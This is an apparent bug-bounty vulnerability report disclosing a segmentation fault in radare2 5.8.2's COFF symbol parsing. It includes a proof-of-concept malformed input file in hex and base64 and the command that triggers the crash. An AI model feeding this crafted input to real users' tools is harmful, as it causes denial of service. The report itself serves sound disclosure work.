SIGSEGV at libr/bin/p/bin_coff.c:509 in patch_relocs() in radareorg/radare2
Valid
Reported on Mar 21st 2023
Description
radare2 5.8.2 misparses symbol information in COFF files, causing a segmentation fault in patch_relocs() at libr/bin/p/bin_coff.c:509.
Proof of Concept
input.bin
00000000: 6603 e846 4058 6458 4036 5858 5858 5868 f..F@XdX@6XXXXXh
00000010: 5858 7063 5858 5840 0038 00de 57ff ffff XXpcXXX@.8..W...
00000020: 7f58 5858 0600 0000 0000 0010 0038 00de .XXX.........8..
00000030: 57ff ffff 7f58 5858 0600 0000 0000 0010 W....XXX........
00000040: 0000 00ff 7fce 0000 4000 b03c 0000 ff7f ........@..<....
00000050: ce00 0040 00b0 3c31 4058 d5d5 d5d5 5800 ...@..<1@X....X.
00000060: 00ff 4f0f 05 ..O..
ZgPoRkBYZFhANlhYWFhYaFhYcGNYWFhAADgA3lf///9/WFhYBgAAAAAAABAAOADeV////39YWFgGAAAAAAAAEAAAAP9/zgAAQACwPAAA/3/OAABAALA8MUBY1dXV1VgAAP9PDwU=
Run with:
r2 ./provided.bin
Impact
This vulnerability could lead to a denial of service (DoS).
References
Comment (2 months ago): Be advised, do not submit a CVE request for it. I already requested one from MITRE directly.